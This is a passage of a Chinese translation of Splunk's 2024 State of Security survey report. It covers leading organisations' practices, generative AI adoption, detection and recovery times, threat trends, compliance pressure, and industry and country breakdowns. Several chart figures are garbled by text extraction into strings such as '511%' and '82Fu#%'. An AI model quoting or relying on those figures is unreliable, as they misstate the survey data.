报告。展开合作并认识韧性的重要性与企业建立联系不仅仅需要CEO的倾听,还需要整个企业的合作。领先组织会与这些技术部门进行更多的合作:合作的部门领先组织正在制定方案的组织软件工程56F%工程运维511%IT 运营76g%合作还会延伸到合规领域。49%的领先组织强烈认为,安全团队中的每个人都将合规作为他们工作的一部分,相比之下,正在制定安全方案的组织中只有 27%的受访者持这种观点。领先组织意识到,在数字韧性方面存在很多风险。他们更强烈地认为,更强的数字韧性可以带来更多的创新(41%),更少的业务中断(39%),还可以规避合规惩罚(39%)可能是因为它们与业务成果更紧密地联系在一起。没有高管的支持,实现网络安全的成熟是一场失败的战斗。Splunk CISO Jason Lee”162024 年安全现状报告|Splunk通过生成式 AI 进行更多创新领先组织也更有可能通过 AI 进行创新,48%的受访者将其视为最重要的举措,相比之下,不太成熟的组织中,只有 30%的组织将其视为最重要的举措。生成式 AI 在他们的安全团队中的采用率也更多、更广泛75%的领先组织表示,大多数安全团队成员都在使用生成式 AI,而对于正在制定方案的组织,只有 23%的组织有相同的说法。与正在制定方案的组织相比,领先组织中生成式 AI 的使用似乎实验性更低,更有条理:82%的领先组织已经建立生成式 AI 安全政策,而在正在制定方案的组织中,只有 46%的组织采取了相同的做法。55%的领先组织有将生成式 AI 用于网络安全用例的正式计划,而正在制定方案的组织中,只有 15%的组织这样说。更快的事件检测和响应速度网络成熟度高并不意味着网络攻击少。但领先组织比其他同类组织的检测和响应速度更快,这样就可以减轻攻击力度及其后果。领先组织指出,对于导致中断的事件,平均检测时间(MTTD)为 21 天,而正在制定方案的组织平均会花费一个月以上的时间(34 天)来检测其网络中的威胁。领先组织在恢复模式上花费的时间也少得多。他们的业务关键型工作负载的平均恢复时间(MTTR)略大于44 小时,而正在制定方案的组织平均恢复时间则需要5.7 天。“缩短检测和响应时间的能力直接说明安全方案的成熟度。这就是为什么 MTTR 和 MTTD 对董事会和高管来说是如此重要的指标。他们希望看到长期可衡量的成功,”Splunk SURGe 安全研究团队的全球安全顾问 Mick Baccio这样说道。缩短检测和响应时间的能力直接说明安全方案的成熟度。这就是为什么 MTTR 和 MTTD 对董事会和高管来说是如此重要的指标。他们希望看到长期可衡量的成功。Splunk 全球安全顾问 Mick Baccio”172024 年安全现状报告|Splunk领先组织的构造块适当地提供资源和授权67(y%将在未来一到两年内大幅增加网络安全支出:表示他们有资源和权力来应对挑战:展开合作并认识韧性的重要性通过生成式 AI 进行更多创新511vg%去年与工程部门加强了合作:去年与 IT 运维部门加强了合作:82Fu#%已经制定生成式 AI 安全政策:表示大多数安全团队成员都在使用生成式 AI:更快的事件检测和响应速度21 天造成中断的事件的 MTTD:34 天1.8 天5.7 天业务关键型工作负载的 MTTR:方案非常先进的组织正在制定方案的组织那些将自己的网络安全方案描述为极其先进的组织,在四个关键维度上始终优于同行。2024 年安全现状报告|Splunk威胁环境评估虽然安全团队可以打一场漂亮仗,但威胁行为者仍然会找到方法,即使采取最好的防御措施。2024 年安全现状报告表明,攻击者并没有放慢脚步,2021 年以来,数据泄露和勒索软件分别增加了 13%和 14%。192024 年安全现状报告|Splunk2024 年,我们看到攻击者使用了不同的战术例如从利用人类欺骗的商业电子邮件入侵到依靠蛮力的 DDoS 攻击。尽管方法各异,但这些威胁都有一个共同的目标:造成破坏。网络安全事件仍然具有深远的声誉、法律和财务后果,但组织似乎更善于吸收打击即使同时还在承受更多攻击。例如,只有 44%的受访者表示,今年恢复事件需要大量的时间和人员,该数字比去年下降了 13%。此外,今年出现生产效率下降和机密数据泄露的受访者有所减少,这表明数字韧性举措正在发挥作用。过去两年出现的事件有所增多数据泄露商务电子邮件入侵网络勒索身份管理攻击DDoS 攻击勒索软件违反法规软件供应链攻击数字资产欺诈系统损害52IHGFECCCI 2024 年安全现状报告|Splunk网络焦虑并不总是与现实相符尽管数百万美元的赎金、CISO 吃官司和零日事件可以成为很好的头条新闻,但这些情况并不常见。当网络安全专家被问及他们最担心的威胁与他们实际上正在经历的威胁时,他们的恐惧有时其实没有必要。例如,尽管受访者表示 AI 攻击是他们最担心的问题,但他们更常见的问题则是数据泄露、商业电子邮件入侵、系统入侵和基于身份的攻击。相反的情况也是如此他们认为的威胁与实际攻击相比显得苍白无力。只有 18%的受访者将商业电子邮件入侵(BEC)列为最令人担忧的威胁,但它在 2024 年最常见的事件排行榜上却高居第二。但也有一些担忧与现实相符。例如,数据泄露是人们最关注的问题,也是遭受攻击最频繁的事件,有 52%的受访者表示在过去两年中至少发生过一次数据泄露事件。恐惧来自未知。组织制定了相关流程和程序来防御数据泄露等常见的攻击,但他们还不知道靠什么(如果有)来阻止基于 AI 技术的攻击。Splunk SURGe 总监 Marcus LaFerrera”基于 AI 技术的攻击数据泄露网络勒索商务电子邮件入侵数据泄露系统损害勒索软件网络勒索系统损害身份管理攻击最令人担忧的网络攻击是什么?你经历过哪些网络攻击?36R$I#I!H!G!2024 年安全现状报告|Splunk人类是出现问题的常见薄弱环节 破坏分子如何获得可乘之机?尽管自动化和生成式 AI 逐渐兴起,但人类仍然是薄弱的环节。受访者认为配置错误的系统是最常见的威胁向量(38%)和最令人担忧的威胁向量(35%)。这种问题和经验之间的一致表明,安全团队知道错误配置是一个问题(监控的功劳!),但无法有效地管理这个问题。系统越来越复杂和安全人才稀缺可能会加剧这个问题,使消除错误配置看起来像是一场打地鼠游戏。主要威胁向量381)(0%系统配置错误内部开发的应用程序中的漏洞已知软件漏洞横向运动零日漏洞222024 年安全现状报告|Splunk以经济利益为目标的攻击持续存在 当涉及到数据泄露、勒索软件和勒索这三种以经济利益为目标的攻击时,攻击者的面孔会非常可怕。曾遭遇数据和系统劫持的受访者比例从 2022 年的35%上升到2024 年的42%。网络勒索比勒索软件本身更常见,这种勒索软件策略包括窃取并威胁公开公司数据。48%的受访者表示他们经历过网络勒索,而 45%的受访者都曾经是勒索软件的受害者。网络勒索的流行可能归因于 2021 年 Colonial Pipeline 事件的成功,以及最近的MOVEit 攻击,在该事件中,俄罗斯勒索软件集团 Clop 预计从勒索中获得了 7500 万至 1 亿美元的不法收入。当组织意识到测试备份的重要性时,网络罪犯可能会从加密转向数据泄露和勒索这些技术涉及的工作较少,产生的回报较高,并且不依赖失败的备份。地缘政治问题加剧了网络危机 2024 年,全球动荡不安。这些日益加剧的地缘政治紧张关系对网络产生了影响,甚至影响到了看似与政治无关的组织。2023 年,一名激进黑客攻击了宾夕法尼亚州的一家水处理厂,这凸显出,面对整个国家的对手和恐怖组织,没有人是绝对安全的。86%的受访者表示,当前的地缘政治气候使他们的组织更容易成为攻击目标。科技公司尤其强烈地认同这种观点(42%),而整体受访者中持这一观点的组织则占 29%。SolarWinds 等与地缘政治关系有关的高调事件提醒科技公司,尤其是 IT 服务提供商,它们可以成为具有政治动机的威胁实施者实现一系列目标的桥梁。有趣的是,只有 17%的公共部门受访者强烈认为,不断加剧的地缘政治紧张局势使他们更容易成为攻击目标,这可能是因为政府组织一直是(很可能永远是)地缘政治攻击的目标。Splunk SURGe 安全分析师 Audra Streetman 说:“激进黑客行为并不总是那么高深莫测。”“出于政治动机的攻击者经常利用比较老的漏洞、默认密码和其他容易实现的目标来攻击组织,这也说明网络卫生比以往任何时候都更重要。”不断加剧的地缘政治紧张局势将继续增加风险,甚至对看似不关心政治的组织也是如此。我们全球供应链的一个副产品是每个数字环节继承的风险。Splunk 全球安全顾问 Mick Baccio”2024 年安全现状报告|Splunk不断攀升的合规压力对于安全专业人员而言,遵守法规就像死亡和税收一样不可避免。事实上,62%的受访者表示,他们已经受到了不断变化的合规要求的影响,这些政策要求披露重大的违规行为。242024 年安全现状报告|Splunk安全专业人士敏锐地意识到,监管环境将以有意或无意的方式造成他们工作的变化。例如,87%的受访者同意,一年后他们将以非常不同的方式处理合规问题。虽然,合规和网络安全无论如何都不会矛盾,但我们可能会遇到为了另一个项目而牺牲一个项目的意外后果。86%的受访者表示,他们将调整预算,以优先处理合规性法规带来的问题,而不是安全最佳实践。这些回答与我们 2023 年 10 月的 CISO 报告相呼应,在该报告中,84%的 CISO 受访者担心因网络安全事件而出现个人责任问题。在同一项研究中,84%的CISO 表示,他们的董事会或管理机构将强大的安全策略等同于监管合规,而不是传统的安全成功指标。原因不难理解。美国新规要求受证券交易委员会(SEC)监管的组织每年对所有“重大”网络安全事件进行披露和说明,并分享有关其风险管理方案的信息。如果不遵守相关规定,可能会受到严厉的经济处罚、法律起诉,甚至高管会因此入狱。在欧盟,NIS2 指令要求组织建立适当的小组来应对事件和信息系统,以交换信息。领先组织可能要为侵权行为承担个人责任。安全专业人员陷入两难境地。低估损失,他们将面临欺诈指控和可能的牢狱之灾。过高估计,或凭空想象会导致公司股价暴跌,并引发董事会的集体不信任。这在一定程度上提出了一个道德难题:你会少报入侵事件,希望它不被发现吗?或者在这个过程中,明知公司股价可能会下跌,却过度报告某个事件,以对自己进行最大的保全,包括你自己?现阶段,监管无疑是安全策略的支柱手段。像桌面游戏这样的模拟练习可以帮助企业发现差距,同时还可以向监管机构证明,在它们成为下一个头条新闻之前,它们在持续改进方面投入了资金。的受访者认为,企业将过度报告违规行为,以此作为规避处罚的手段。的受访者预测,上市组织的估值将因报告重大违规行为而下降。的受访者认为两种情况都会发生。63a&%报告重大违规行为的新规带来的后果252024 年安全现状报告|Splunk安全、法律和合规团队联合起来之前,合规部门主要是一个事务性部门。合规团队独立运行,通常不与安全团队沟通,甚至不完全理解安全团队的角色,反之亦然。监管的缺失让这种情况成为历史,因为不合规会带来更多严重的后果。2023 年10 月,美国证券交易委员会(SEC)指控 SolarWinds 前首席信息官欺诈和内部控制失误,导致了2020 年毁灭性的网络攻击,指控他在公司的网络安全实践方面误导了股东。董事会、法律、合规和安全团队之间的沟通是没有商量余地的,所以学会和睦相处是必须的。组织和他们的董事会将不得不长远考虑,认真思考,当违约发生时(而不是如果发生的话),谁应该承担最大的责任。而这个角色往往是 CISO。但也可能包括首席技术官(CTO)、首席信息官(CIO),甚至是董事会中的网络专家,他们可能成为衍生诉讼的目标,或遭受额外的审查。这些发展对安全专业人员产生了深远影响,大多数受访者都加强了安全实践,并促进了法律和合规团队之间的一致。让每个人都站在同一条战线上会有好处。调整优先任务、角色和职责会让安全态势更加有效,同时让法律和合规团队具有更高权限,并提升自我管理能力。安全和合规团队如何展开合作的受访者正在加强对法律和合规团队的安全培训的受访者正在加强对安全团队的法律和合规培训的受访者表示他们的安全团队中的每个人都把合规作为工作的一部分90&2024 年安全现状报告|Splunk合规业务涉及个人对 SolarWinds 的起诉是一个分水岭这是 SEC 首次就网络安全事件起诉 CISO。这一前所未有的操作标志着全球网络安全态度的一个转折点,这将对安全领导人及其团队产生持久的影响。现在,网络风险和商业风险毫无疑问是同义词。SEC要求高管和其他利益相关者承担责任,他们没有刻意隐瞒。除了一系列全面实施的全新全球指令外,安全团队还必须更快地报告事件。欧盟的NIS2 允许 24 至 72 小时,而美国证券交易委员会(SEC)则会提供稍多一点的喘息空间,最多可达 4 个工作日。尽管如此,窗口期仍在缩小这一发展可能也意味着我们对最老练的专业人士的需要。更多的事件问责制可能会带来更好的安全实践,但它也可能对这一职业产生寒蝉效应。有多少人愿意因为工作中的一个错误而坐牢呢?这种恐惧可能被夸大了,但这些特殊情况代表着一种真正的威慑。当网络团队面临人才短缺时,对合规惩罚的担忧是人员流失的又一个理由。合规压力导致员工对职业的不确定的受访者认为,个人责任的风险正在削弱网络安全领域的吸引力。的受访者表示,由于工作压力大,他们考虑过彻底离开这个行业。36%的受访者表示,他们曾多次考虑离开这一行业。76p2024 年安全现状报告|Splunk2024 年,网络安全将受到一系列全球动态的影响,包括新的合规要求和地缘政治紧张局势,但我们也有理由抱有希望。对 AI 持自信和乐观态度对防御人员而言是一种好现象特别是如果组织可以降低风险并保持对员工使用 AI 工具的方式进行控制。另一个乐观的理由是,企业正在加大对网络安全的投入。几乎所有接受调查的组织(96%)都表示,他们将在未来一到两年内增加在网络安全方面的支出。奋进未来两年排名最靠前的网络安全优先任务1.为网络安全和 IT 运维人员提供安全运营培训2.购买有助于实现自动化/协调 SecOps 流程的安全运维工具3.积极开发和构建安全分析和运营工具的集成软件体系结构4.除了现有的工具之外,研究、测试和/或部署基于云的安全分析/运营技术5.增加安全运维的外采资源(例如第三方托管安全服务供应商)282024 年安全现状报告|Splunk最后的建议面对如此多的变化和不断发展的技术,组织可能很难确定应将精力集中在哪些领域。Splunk 的专家结合今年的数据提出了他们的建议。在整个企业中采用生成式 AI。这一技术手段已经在整个企业(93%)和安全团队(91%)得到广泛采用。对生成式 AI 持抵制态度的组织可能会逐渐落后。试图完全禁止这一手段则会扼杀创新,同时为影子 AI 提供可乘之机。在不牺牲创新的情况下制定经过深思熟虑的生成式 AI 策略。在不考虑风险和影响的情况下仓促采用生成式 AI 是一个错误。围绕生成式 AI 制定策略,并为业务和安全用例制定计划,以领先于 34%尚未制定成文策略的组织。确定哪些生成式 AI 风险最令人担忧(49%的受访者认为最大风险是数据泄漏)并制定专门用于解决这些问题的策略。强调团队之间的协作和工具之间的整合。具备数字韧性的组织正在打破软件工程、工程运维,以及最重要的 IT 领域相互孤立的局面。76%的领先组织今年加强了与 IT 运维部门的合作,以提升数字韧性。减少摩擦的另一种方法是工具整合,它可以防止仪表板超载,并帮助团队专注于有意义的威胁。43%的受访者表示,他们在过多不同的安全工具和管理控制平台之间进行转换。与法律和合规团队统一步调。今年将迎来安全领导合规的一个新时代,他们应该与法律和合规团队密切合作,以最大限度地保持步调一致。91%的受访者表示,安全团队已经把合规作为他们工作的一部分。组织可以依靠模拟练习(如桌面游戏)来帮助发现安全性和合规性差距,同时向监管机构证明他们在持续改进方面进行了投入。292024 年安全现状报告|Splunk学习如何有效地协调资源。网络安全的成熟度来自于自上而下的整个协调95%的领先组织表示他们有资源和专门的机构来解决问题。CISO 尤其应该能够从商业角度讨论和转化安全风险,以便在与高管们的谈判桌上获得一席之地。以强调网络安全投资商业价值的方式与董事会沟通。这包括报告网络安全事件对企业的影响,或阐明可以产生严重法律或财务后果的合规性要求。跳出思维定式,弥合人才短板。数据显示,领先组织的招聘和培训方式相对没有那么传统。53%的领先组织正在使用 AI 和机器学习来填补招聘空缺,而在正在制定方案的组织中,这一比例仅为 28%。这些创造性的招聘和培训策略(比如允许非安全角色的人员进入 SOC 的方案)可以帮助缩小技能差距,并为安全团队实现急需的多样性。勿忘基本方案。虽然网络安全威胁变得越来越复杂,但对手仍然依赖于可靠的技术,系统配置错误仍然是 2024 年的主要威胁。实施基本管理方案可以保证组织获得最大的投资回报,使其更容易满足长期需求。尽管 76%的受访者认为完成 IT 资产清单花费的时间过长,但花这些时间是值得的。对资源及其依赖关系的最新视图可以防止出现危险的盲点。关注影响网络安全环境的全球动态。网络安全不是存在于真空环境的问题。政治、全球冲突和严格的合规要求对威胁环境有直接和间接的影响。86%的受访者表示,当前的地缘政治气候使他们成为更大的攻击目标,62%的受访者表示,他们受到了不断变化的合规要求的影响。当组织意识到这些动态变化时,他们可以更加轻松地绕过相关的障碍。302024 年安全现状报告|SplunkSplunk 的视角来自领导者,针对领导者想知道有关 2024 年及以后网络安全趋势的更多高管见解吗?了解领导者如何应对当今最紧迫的安全挑战,包括 AI、新兴威胁和不断变化的合规环境。了解更多信息开始使用构建数字韧性 当今的安全团队长期承受着来自网络威胁、不断变化的法规和不断加剧的地缘政治紧张局势的压力。看看你所在的组织如何在乱局中恢复,并蓬勃发展。构建 数字韧性了解如何通过 Splunk 方案实现数字韧性2024 年安全现状报告|Splunk行业数据我们确定了全球六个代表性行业的关键见解。方法学 制造业与其他行业相比,制造商更关注云安全,40%的制造商将其列为首选方案。零日漏洞也是制造商最关心的问题,39%的制造商将其列为最关注的问题,可能是由于维修关键基础设施固有的困难。制造业的受访者也在努力应对不断变化的威胁环境:51%的制造业安全专业人员表示,在过去的 12 个月里,安全需求变得更加严格。制造业的受访者更有可能表示,威胁复杂化的增加使他们陷入困境(50%,其他行业的这一比例为 38%)。这些困境可能表明企业投入不足,因为制造商不太可能(36%)预计网络安全支出大幅增加,而所有行业的这一比例为 48%。然而,在招聘安全人才方面,制造业受访者似乎比其他行业更有优势:27%的受访者表示,工作压力迫使他们或其他人多次考虑离开网络安全领域,这一比例远低于其他行业的 36%。27%的受访者表示,一个关键项目因技能短缺而多次推迟,而其他行业的这一比例为 37%。由于制造企业很难获得额外的网络安全预算,安全主管应该展示事件的财务影响,并专注于关键风险,以获得高层和董事会的支持。金融服务与其他行业相比,金融服务业的受访者对自己满足网络安全需求的能力更为乐观。50%的受访者认为今年更容易保持下去,而其他行业的这一比例为 41%。IT和工程领域的更多合作可能会推动这种乐观情绪。金融机构的安全团队表示,他们更倾向于与工程运营部门密切合作,制定各种数字韧性措施(64%,其他行业的这一比例为 46%)。金融服务受访者也对生成式 AI 在缓解人才缺口方面的作用更抱希望。他们一致认为生成式 AI 将在以下方面有所帮助:组织更快地获取和引进人才(63%,其他行业 58%)提高经验丰富的安全专业人员的工作效率(71%,其他行业 65%)但他们也认识到生成式 AI 的风险。76%的金融服务受访者表示,他们没有获得足够的培训来充分理解生成式 AI的影响,在其他行业中,这一比例为 65%。因此,39%的受访者将AI攻击列为首要问题。不出所料,金融服务公司的安全专业人士表示,合规已经成为一项非常庞大的工作,需要一个独立的团队来完成(43%,其他行业的这一比例为 39%)。网络勒索在金融机构中也更为常见(54%,其他行业为 48%)。研究人员在 2023 年 12 月和 2024 年 1 月对 1650 名安全管理人员进行了调查。受访者来自澳大利亚、法国、德国、印度、日本、新西兰、新加坡、英国和美国。他们也代表着 16 个行业:航空航天和国防、商业服务、包装消费品、教育、金融服务、政府(联邦/国家、州和地方)、医疗、生命科学、制造业、技术、媒体、石油/天然气、零售/批发、电信、运输/物流和公用事业。322024 年安全现状报告|Splunk通信和媒体57%的通信和媒体受访者认为他们的网络安全方案“非常先进”(其他行业的这一比例为47%)。然而,这个行业也最有可能表示他们没有资源或权力来解决挑战(16%,相比之下其他行业的这一比例为 8%)。通讯和媒体行业在以下方面面临着最大的压力:82%的受访者表示,由于受攻击面频繁变化和增长,他们很难应对安全卫生和环境管理方面的挑战,而在其他行业中,这一比例为 71%。62%的受访者表示,他们的 SOC 主要在过多不同的安全工具和管理控制平台之间进行转换,而在其他行业中,这一比例为 43%。47%的受访者表示,由于无力聘用或留住拥有适合技能的员工,他们或其他人曾多次考虑离开网络安全行业,而其他行业的这一比例为 36%。74%的受访者表示他们受到不断变化的合规要求的影响,而在其他行业中,这一比例为 62%。这些困难可能导致通信和媒体组织遭遇几种类型的事件的频率越来越高,包括内部攻击(55%,其他行业 42%)、数字资产欺诈(59%,其他行业 43%)、软件供应链攻击(57%,其他行业 43%)以及针对性攻击(54%,其他行业 44%)。通讯和媒体行业的系统配置错误问题更大,44%的行业受访者称这是过去两年存在这种状况的根本原因。通信和媒体组织应该专注于获得高管的政策支持,以进一步提高其网络安全方案的成熟度。当网络安全团队拥有解决问题的资源和权力时,他们可能会在威胁预防方面看到更好的结果。技术来自技术公司的受访者表示,他们很难适应复杂的环境。因此:技术公司更有可能将安全栈的复杂性作为它们难以满足网络安全要求的原因(技术公司的比例为 36%,而其他行业的比例为 26%)。技术公司更倾向于表示,他们拥有的分散安全工具过多,缺乏人手来完成手动工作(技术公司的比例为 37%,其他行业为 26%)。已知的软件漏洞(34%)和内部应用程序中的漏洞(34%)是技术领域事故的更常见的根本原因。不断变化的监管环境是另一个障碍41%的技术公司受访者表示,这导致它们难以应对相应的局面,而其他行业的这一比例为 28%。地缘政治冲突对技术公司的影响也更为严重。他们(42%)强烈认为,国际冲突导致他们的组织更多地成为对手的攻击目标,而其他行业的这一比例为29%。从积极的方面来看,技术公司(63%)更有可能表示预期的安全支出显著增加,而其他行业的这一比例为 48%。对于面临复杂性问题的技术组织来说,任务的核心应该是简化。工具整合可能是该领域的一个重要举措,而该领域似乎正遭受新奇事物综合征的困扰。332024 年安全现状报告|Splunk医疗 医疗组织的 MTTD 问题最多,31%的组织表示他们以月为单位衡量 MTTD,而在全部行业中,只有 19%的组织这样表示。与其他行业相比,此行业应对勒索软件攻击的数量也更多,在过去两年中,有 56%的组织表示发生过勒索软件攻击,而在全部行业中,这一比例为 45%。与其他行业相比,医疗行业也更有可能将过度宽松的帐户(33%)列为事故最常见的根本原因。与其他行业相比,医疗受访者表示他们遇到了更多与招聘相关的问题:44%的受访者表示,团队成员曾被要求在没有必要经验的情况下领导项目,而其他行业的这一比例为 39%。44%的受访者表示,有关键项目或计划因招聘问题而推迟,而其他行业的这一比例为 37%。大多数医疗受访者表示,他们受到了不断变化的合规要求的影响(67%)。他们也更有可能强烈认为(44%,所有行业中最高的比例),这些变化正在导致更多的高级人员要做到 24/7 随叫随到,而在其他行业中,这一比例为 35%。医疗领域的受访者对生成式 AI 所持的乐观态度最低。52%的受访者表示,他们预计对手会从中受益更多,而其他行业的这一比例为45%。他们也对使用 AI 来对抗他们预计对手将获得的竞争优势不太感兴趣,只有 37%的医疗机构将 AI 列为优先事项,而其他行业的这一比例为 44%。考虑到医疗部门在威胁检测、勒索软件预防和招聘方面存在的问题,回归到网络安全卫生的基础问题可能是一条成功的道路,这样这些组织就能够以更少的投入完成更多的工作。公共部门来自公共部门的数据凸显了对相关知识的渴求。公共部门的受访者更重视安全意识培训(24%,其他行业的比例为 17%)。因此,他们认为最大的挑战是缺乏网络安全知识和管理人员的支持(28%,其他行业为 20%)。虽然去年公共部门的受访者对传统 AI 减轻安全团队负担的能力感到犹豫,但今年公共部门对生成式 AI 表现出了乐观的态度:来自公共部门的受访者最有可能看到生成式 AI 对业务产生“改变游戏规则”影响的机会(55%,其他行业 47%),并预计安全团队将获益最大(55%,其他行业 46%)。公共部门的安全团队在采用可接受的 AI 使用政策方面处于领先地位(77%,其他行业 66%)。公共部门的受访者也更有可能设想生成式 AI 的安全用例,包括威胁检测(46%,其他行业 35%)、渗透测试(42%,其他行业 29%)和安全团队培训(44%,其他行业 34%)。公共部门组织似乎也比同行更渴望实现 SecOps 自动化,包括自动化 SSL 证书管理(43%,其他行业 31%),跨安全控件的操作编排(53%,其他行业38%),以及警报增强(47%,其他行业32%)。在网络安全基础方面,公共部门更频繁地将配置错误列为威胁的首要因素,42%的受访者表示它们通常是根本原因。公共部门的受访者也最可能担心横向运动,39%的受访者将其列为首要担忧。缺乏对AI的知识和热情可能是一个危险的组合,因此公共部门组织应该采取一种慎重的方法来采用 AI,并在加入生成式 AI的浪潮之前接受风险方面的培训。342024 年安全现状报告|Splunk典型国家/地区来自全球八个国家/地区的简要情况。澳大利亚 来自澳大利亚各组织的数据描绘了一幅令人痛心的网络安全图景。澳大利亚的组织更有可能强烈认同地缘政治压力会加剧网络攻击(44%,而全球比例为 29%)。56%的澳大利亚受访者经历过全国性攻击,而全球这一比例为 39%。事实上,澳大利亚受访者经历的每种攻击类型都高于平均水平,包括但不限于数据泄露(63%,全球52%);违规(53%,全球43%);内部攻击(55%,全球 42%)和商业电子邮件攻击(59%,全球 49%)。也许网络攻击频率更高可以归因于澳大利亚受访者的可见性相关问题。72%的受访者表示,他们在不同的安全工具之间切换过多(全球比例为 43%),35%的受访者表示攻击面可见性存在问题(全球比例为 20%)。难怪澳大利亚也提到了检测问题,50%的受访者表示一般情况下 MTTD 需要几个月,而全球的这一比例只有 19%。澳大利亚的受访者也比其他国家/地区的受访者更容易应对与工作人员相关的挑战:52%的受访者表示,团队成员曾多次被要求在没有必要经验的情况下领导项目,而在全球范围内,这一比例为 39%。50%的受访者表示,工作压力迫使自己或他人多次考虑过放弃网络安全工作,而全球只有 36%的受访者这样认为。52%的受访者表示,关键的安全项目或计划被多次推迟,而全球这一比例为 37%。澳大利亚是生成式AI 采用和政策制定的领导者,69%的受访者表示他们的员工使用公共生成式 AI 工具进行工作,而全球这一比例为 54%,73%的受访者表示他们已经为生成式AI 的使用制定了安全政策,全球这一比例为66%。法国法国的受访者更倾向于表示,他们在过去一年里一直在努力满足网络安全需求(56%,全球比例为 46%)。不出所料,该国家的网络安全成熟度似乎也较低,只有 37%的受访者认为他们的方案“非常先进”,而全球的这一比例为 47%。当被问及为什么网络安全需求越来越难以满足时,33%的法国受访者表示,他们的安全栈中的工具和供应商数量已经变得过多,而全球这一比例为 26%。复杂的技术栈通常会导致配置错误,40%的法国受访者表示这是一个担忧。在广泛采用具有AI 和机器学习能力的网络安全工具方面,法国落后于其他国家/地区(27%,全球 37%)。虽然法国的组织更倾向于表示他们专注于AI(法国56%,全球44%),但他们为生成式 AI 的使用建立安全策略的可能性更小(52%,全球 66%)。好的一面是,法国受访者表示,在过去两年中,他们经历的以下攻击类型的事件少于全球平均水平:44%的受访者经历过数据泄露 37%的受访者违反了监管合规性 37%的受访者遭遇了 DDoS 攻击 40%的受访者成为勒索软件攻击的受害者352024 年安全现状报告|Splunk德国来自德国受访者的数据表明,与他们的同行相比,他们对生成式 AI 的风险有更敏锐的意识:41%的德国受访者强烈同意,生成式 AI 将他们的攻击面扩大到令人担忧的程度,而全球的这一比例为 31%。38%的德国受访者强烈同意,生成式 AI 使他们现有的攻击面更脆弱,而全球这一比例为 29%。德国的组织似乎在人员配备方面遇到了较大的困难。33%的受访者表示,过去一年网络安全需求更难满足的原因是无法聘用到足够的熟练安全人员,而全球这一比例为 25%。在 SOC 中,53%的德国受访者认为不同的安全工具之间存在过多的转换(全球这一比例为 43%)。也许这些不同的工具中有许多是基于云的工具,因为德国认为对云基础设施的攻击是最令人担忧的类型之一(23%)。这些招聘和工具限制可能导致 MTTD 比其他国家/地区稍长;40%的德国受访者以周为单位衡量他们的 MTTD,全球的这一比例为35%。尽管遭遇了这些困境,但德国在遭受勒索软件攻击时抢救数据和系统的能力方面,仍优于其他国家/地区。58%的受访者在过去两年中成功做到了这一点(这是我们调查的所有国家/地区中比例最高的),而全球这一比例只有 44%。德国的受访者也更有可能(94%)认为,当今的地缘政治气候正导致更多的组织成为对手的攻击目标,而全球的这一比例为 86%。印度与其他国家相比,印度有最高比例(66%)的组织认为自己的安全方案“非常先进”,而全球这一比例为 47%。他们内部团队的合作比例也更高软件工程团队 58%,工程运维团队 52%,IT团队 78%。印度的受访者也特别关注云安全,48%的受访者将其列为首选方案,而全球的这一比例为 35%。不出所料,与其他国家/地区相比,印度最有可能将对云基础设施的攻击列为首要问题(25%)。然而,印度最担心的是网络勒索,37%的受访者表示这是最令人担心的问题,而全球的这一比例只有 24%。要求披露重大违规行为的合规要求似乎对印度产生了很大影响,81%的印度受访者表示他们受到了这些变化的影响,而全球这一比例为62%。相应地,54%的印度受访者强烈表示,安全团队中的每个人都应该将合规作为自己工作的一部分,而在全球范围内,这一比例为 42%。印度的受访者对生成式 AI 将如何扭转局面最为乐观51%的受访者预计防御人员将获得更大的优势,而全球的受访者的这一比例为 43%。他们还更经常地认识到生成式 AI 的潜在用例,其中包括:威胁检测和优先级排序(52%,全球 35%)训练用例(50%,全球 34%)威胁情报分析(55%,全球 39%)创建检测规则(44%,全球 30%)安全数据汇总(54%,全球 34%)同样,印度的受访者似乎在构建生成式 AI 策略方面走在了前沿。82%的受访者为终端用户建立了生成式 AI 安全策略,而全球这一比例为66%。362024 年安全现状报告|Splunk日本与其他国家/地区相比,日本受访者更有可能认为网络安全需求越来越难以满足(54%,全球 46%)。只有 27%的日本受访者认为安全工作越来越容易,而全球的这一比例为 41%。在这些受访者中,只有 5%的受访者认为这项工作变得容易得多,而全球平均水平为 17%。为什么日本的组织难以满足这些要求?与其他国家/地区相比,他们更多地提到了以下不足:36%的受访者认为他们的安全栈变得过于复杂,而全球的这一比例只有 26%。29%的受访者无法有效分析所有安全相关的数据,而全球这一比例为 21%。27%的受访者认为攻击面的可见性有限,而在全球范围内这一比例为 20%。另一种可能是预算不足。日本表示预期网络安全支出大幅增加的可能性更低(38%)。日本受访者对生成式 AI 对 SOC 从业者的好处不太乐观,只有 37%的受访者强烈认为这将有助于发展他们的技能,而全球这一比例为 43%。在接受调查的国家/地区中,日本最重视勒索软件防御,21%的受访者认为这是最重要的举措。这种注意力的增强可能会以更快 MTTD 的形式产生回报43%的日本受访者表示了以天为单位的 MTTD,而全球平均水平为33%。新加坡来自新加坡受访者的数据显示,新加坡组织的网络安全方案不如其他国家成熟。新加坡认为其网络安全方案“正在制定”的受访者比例最高(14%,全球数据为 7%)。他们不太可能表示自己有权力和资源应对网络安全挑战(只有 77%,而全球总体比例为 91%)。新加坡表示预期网络安全支出大幅增加的可能性最低(28%)。26%的新加坡受访者不知道他们的平均 MTTR,25%的受访者没有进行事后分析来计算 MTTD。因此,新加坡受访者不太可能认识到数字韧性带来的商业影响。只有 23%的受访者强烈认为数字韧性可以提高客户保留率,而全球这一比例为 33%。25%的受访者强烈认为,数字韧性可以防止出现重大服务中断,全球这一比例为 35%。来自新加坡的组织似乎较少关注合规性、安全性和法律团队之间的合作。只有 29%的受访者强烈认为他们需要加强合规团队的安全培训,而全球这一比例为 42%。只有29%的受访者强烈认同将合规性纳入安全团队的工作流程,而全球的这一比例为42%。我们的数据表明,方案成熟度和 AI 优先级之间存在相关性,因此,新加坡只有 36%的受访者专注于AI 手段,而全球这一比例为 44%,这并不奇怪。他们也不太可能(48%)构建生成式 AI 策略。与其他国家/地区相比,新加坡也是最不担心 AI 攻击的国家,只有 23%的受访者将其列为最令人担心的攻击。372024 年安全现状报告|Splunk英国与全球其他国家/地区相比,英国的数据显示总体上是积极的。英国各组织正在加强合作,以更经常地实现韧性:66%的受访者表示他们的安全团队与软件开发团队正在加强合作(全球比例为 54%)。56%的受访者表示,他们的安全团队和工程运维团队正在加强合作(全球比例为 